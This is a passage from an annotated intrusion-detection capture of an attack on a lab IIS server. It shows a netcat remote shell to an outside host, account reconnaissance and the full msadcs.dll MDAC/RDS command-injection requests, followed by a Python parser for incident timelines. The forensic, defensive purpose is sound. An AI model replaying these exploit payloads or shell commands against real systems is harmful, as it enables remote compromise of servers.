....12/26/00 07:36p micr
osoft..12/26/00 07:35p newfiles..12/26/00
07:24p unix.. 5 File(s)
0 bytes.. 1,690,861,056 byte
s free....C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.089824 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60793 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CBEC6DE Ack: 0x9E43FBAE Win: 0x21A3 TcpLen: 20
cd microsoft..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.414143 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61049 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0x2CBEC6EC Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
..C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:10.883022 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61305 IpLen:20 DgmLen:541 DF
***AP*** Seq: 0x2CBEC71C Ack: 0x9E43FBB1 Win: 0x21A0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\microsoft....12/26/00 07
:36p ...12/26/00 07:36p
.....11/05/97 09:46a 87,312 95sscrk.zip..08
/15/00 02:06p 734 ac.zip..08/12/98 09:46a
9,417 anger.tar.gz.. 5 File(s)
97,463 bytes.. 1,690,861,056 bytes f
ree....C:\exploits\microsoft>..C:\exploits\microsoft>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:22.658346 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:62841 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBEC911 Ack: 0x9E43FBB8 Win: 0x2199 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:25.616190 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64121 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0x2CBEC934 Ack: 0x9E43FBC5 Win: 0x218C TcpLen: 20
cd newfiles....C:\exploits\newfiles>..C:\exploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.417624 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64633 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEC96F Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\newfiles....12/26/00 07:
35p ...12/26/00 07:35p
....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:26.906565 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:64889 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x2CBECA37 Ack: 0x9E43FBCA Win: 0x2187 TcpLen: 20
2 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits\newfiles>..C:\e
xploits\newfiles>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:29.268152 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:122 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECAC8 Ack: 0x9E43FBD1 Win: 0x2180 TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:30.670116 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:890 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x2CBECAEB Ack: 0x9E43FBDA Win: 0x2177 TcpLen: 20
cd unix....C:\exploits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:31.521418 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1402 IpLen:20 DgmLen:151 DF
***AP*** Seq: 0x2CBECB1A Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits\unix....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:32.010521 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:1658 IpLen:20 DgmLen:581 DF
***AP*** Seq: 0x2CBECB89 Ack: 0x9E43FBDF Win: 0x2172 TcpLen: 20
12/26/00 07:24p ...12/26/00 07:24p
....12/26/00 07:25p suno
s-exploits..12/26/00 07:24p tcp-exploits.
.12/26/00 07:24p trojans..12/26/00 07:16
p udp-exploits..12/26/00 07:15p ultrix-exploits..12/26/00 07:15p
xwin-exploits.. 8 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\expl
oits\unix>..C:\exploits\unix>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:37.480132 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2682 IpLen:20 DgmLen:75 DF
***AP*** Seq: 0x2CBECDA6 Ack: 0x9E43FBE7 Win: 0x216A TcpLen: 20
cd ......C:\exploits>..C:\exploits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:37.830864 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:2938 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECDC9 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\exploits....12/26/00 07:36p
...12/26/00 07:36p ....1
2/26/00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:38.338194 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:3194 IpLen:20 DgmLen:302 DF
***AP*** Seq: 0x2CBECE91 Ack: 0x9E43FBEB Win: 0x2166 TcpLen: 20
07:36p microsoft..12/26/00 07:35p
newfiles..12/26/00 07:24p
unix.. 5 File(s) 0 bytes..
1,690,861,056 bytes free....C:\exploits>..C:\exp
loits>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After exploring the subdirectories, he/she 'cd's back to 'c:\'
[**] netcat session 6969 [**]
02/04-05:45:40.584634 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4218 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x2CBECF97 Ack: 0x9E43FBF4 Win: 0x215D TcpLen: 20
cd ......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:40.935399 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4474 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBECFAA Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:41.432721 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:4730 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED072 Ack: 0x9E43FBF7 Win: 0x215A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:42a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'pdump.exe' again and append the output to file 'c:\yay.txt'
!@# He/She might have noticed the 0 file size for yay.txt in the directory listing.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:45:55.240124 213.116.251.162:1901 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12216 IpLen:20 DgmLen:753 DF
***AP*** Seq: 0xA114BDBA Ack: 0x2CC17E0C Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 559..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 350..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .p
.d.u.m.p...e.x.e. .>.>. .c.:.\.y.a.y...t.x.t.".).|.'.......d.r.i
.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*..
.m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\
.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!W
ORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:58.581282 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7802 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED308 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:45:59.165524 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8058 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED3D0 Ack: 0x9E43FBFC Win: 0x2155 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:01.285062 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9082 IpLen:20 DgmLen:165 DF
***AP*** Seq: 0x2CBED666 Ack: 0x9E43FC02 Win: 0x214F TcpLen: 20
dir'..The name specified is not recognized as an..internal or ex
ternal command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.098674 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9594 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBED6E3 Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:03.659599 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:9850 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBED7AB Ack: 0x9E43FC07 Win: 0x214A TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:44a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# After running dir a couple more times and seeing the same result (0 file size), he/she tries to read the file using 'cat'.
!@# This fails, as this still isn't a *nix box.
[**] netcat session 6969 [**]
02/04-05:46:06.402691 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:11130 IpLen:20 DgmLen:168 DF
***AP*** Seq: 0x2CBEDA41 Ack: 0x9E43FC10 Win: 0x2141 TcpLen: 20
cat yay..The name specified is not recognized as an..internal or
external command, operable program or batch file.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:08.806154 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12666 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDAC1 Ack: 0x9E43FC1B Win: 0x2136 TcpLen: 20
type yay...The system cannot find the file specified.....C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries again using the 'type' command.
!@# File yay.txt is empty
[**] netcat session 6969 [**]
02/04-05:46:11.710118 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:14202 IpLen:20 DgmLen:66 DF
***AP*** Seq: 0x2CBEDB04 Ack: 0x9E43FC29 Win: 0x2128 TcpLen: 20
type yay.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:46:20.322907 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15482 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBEDB1E Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
net session..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using the remote shell (web server privileges), he/she tries to run the 'net session' command, likely to check for netbios shares in use.
!@# This fails due to lack of privileges.
[**] netcat session 6969 [**]
02/04-05:46:20.787688 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:15738 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEDB2B Ack: 0x9E43FC36 Win: 0x211B TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Using remote shell, he/she runs 'net users' command for a listing of local accounts.
[**] netcat session 6969 [**]
02/04-05:46:24.733232 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17018 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBEDB6E Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
net users..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# It works
[**] netcat session 6969 [**]
02/04-05:46:25.183904 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:17274 IpLen:20 DgmLen:315 DF
***AP*** Seq: 0x2CBEDB79 Ack: 0x9E43FC41 Win: 0x2110 TcpLen: 20
..User accounts for \\.....-------------------------------------
------------------------------------------..Administrator
Guest IUSR_KENNY ..IWAM_KE
NNY ..The command completed with one or more error
s........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability (system privs.) to run 'net session' command and redirect output to file 'yay2.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:48.722495 213.116.251.162:1922 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12462 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA2D450B8 Ack: 0x2CC3394E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.y.a.y.2...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to run 'net session' command and redirect output to file 'c:\yay2.txt'.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:55.733919 213.116.251.162:1924 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12474 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0xA2F0BD5C Ack: 0x2CC3551E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.c.:.\.y.a.y.2...t.x.t.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
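As an added example (not part of this write-up or the sniffer's output), the Python below rebuilds what each msadcs.dll POST on this page actually ran and lines it up with the netcat shell traffic, which is the check a responder wants before pulling files off the box. It assumes the dump format shown here: records split by the =+=+ rule lines, a [**] name [**] header, a timestamp line, two TCP lines, then payload wrapped at 64 columns with non-printable bytes printed as '.', and the RDS query sent as UTF-16LE (hence 'S.e.l.e.c.t.').

```python
# Added example, not part of the original write-up: rebuild a timeline of the
# MDAC/RDS command injections and the netcat shell from this Snort ASCII dump.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: two records copied verbatim from this capture (raw string).
SAMPLE_LOG = r"""
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:55.733919 213.116.251.162:1924 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12474 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0xA2F0BD5C Ack: 0x2CC3551E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.c.:.\.y.a.y.2...t.x.t.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to read file 'c:\yay2.txt'. Nobody is connected.
[**] netcat session 6969 [**]
02/04-05:48:59.035475 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31354 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x2CBEE01B Ack: 0x9E43FC55 Win: 0x20FC TcpLen: 20
type yay2.txt..There are no entries in the list........C:\>..C:\
>
"""

RULE_LINE = re.compile(r"(?m)^(?:=\+)+=?\s*$")        # the =+=+ record separators
HEADER = re.compile(r"^\[\*\*\] (.+?) \[\*\*\]$")
ADDR = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+) -> (\S+)$")
TEXT_START = re.compile(r"(?:[A-Za-z]\.){4,}")       # first word of the UTF-16LE text
PAIR_RUN = re.compile(r"(?:[ -~]\.)+")               # printable byte + NUL, repeated


@dataclass
class RdsCall:
    text: str                  # decoded varg arguments (query + connect string)
    shell_cmd: Optional[str]   # what the Jet '|shell("...")|' expression ran
    writes_to: Optional[str]   # file the command redirected into, if any
    dbq: Optional[str]         # .mdb the Access driver was pointed at


def split_records(log: str) -> List[tuple]:
    """(name, timestamp, source, payload) per record; '!@#' notes are skipped."""
    out = []
    for chunk in RULE_LINE.split(log):
        lines = [l for l in chunk.strip().splitlines() if not l.startswith("!@#")]
        if len(lines) < 5:
            continue
        hdr, addr = HEADER.match(lines[0]), ADDR.match(lines[1])
        if hdr and addr:   # 64-column payload lines are re-joined with nothing between
            out.append((hdr.group(1), addr.group(1), addr.group(2), "".join(lines[4:])))
    return out


def parse_rds_payload(payload: str) -> Optional[RdsCall]:
    """Decode the x-varg body of an msadcs.dll POST: each query character is
    followed by a NUL that the dump prints as '.', so keep the even offsets."""
    if "msadcs.dll" not in payload:
        return None
    body = payload.split("application/x-varg", 1)[-1]
    start = TEXT_START.search(body)
    if not start:
        return None
    text = PAIR_RUN.match(body, start.start()).group(0)[::2].rstrip(".")
    cmd = m.group(1) if (m := re.search(r'shell\("(.*?)"\)', text)) else None
    out = m.group(1) if cmd and (m := re.search(r">>?\s*(\S+)", cmd)) else None
    dbq = m.group(1) if (m := re.search(r"dbq=([^;]+)", text)) else None
    return RdsCall(text, cmd, out, dbq)


def timeline(log: str) -> List[Dict[str, Optional[str]]]:
    """RDS events carry the injected command and the file it wrote (worth pulling
    off disk); netcat events carry the echoed command before the first CR/LF ('..')."""
    events = []
    for name, ts, src, payload in split_records(log):
        rds = parse_rds_payload(payload)
        if rds:
            events.append({"ts": ts, "kind": "rds-shell", "cmd": rds.shell_cmd, "writes_to": rds.writes_to})
        elif "netcat" in name:
            events.append({"ts": ts, "kind": "netcat", "cmd": payload.split("..", 1)[0]})
    return events
```

The writes_to value names the file to recover from the server's disk; when the attacker gave no drive path it lands in the msadc working directory, as the write-up notes for the first yay2.txt.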
[**] netcat session 6969 [**]
02/04-05:48:53.427873 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29050 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEDC8C Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.996784 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29306 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEDD54 Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:46a
38 yay2.txt.. 14 File(s) 78,643,560
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to read file 'c:\yay2.txt'. Nobody is connected.
[**] netcat session 6969 [**]
02/04-05:48:59.035475 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31354 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x2CBEE01B Ack: 0x9E43FC55 Win: 0x20FC TcpLen: 20
type yay2.txt..There are no entries in the list........C:\>..C:\
>
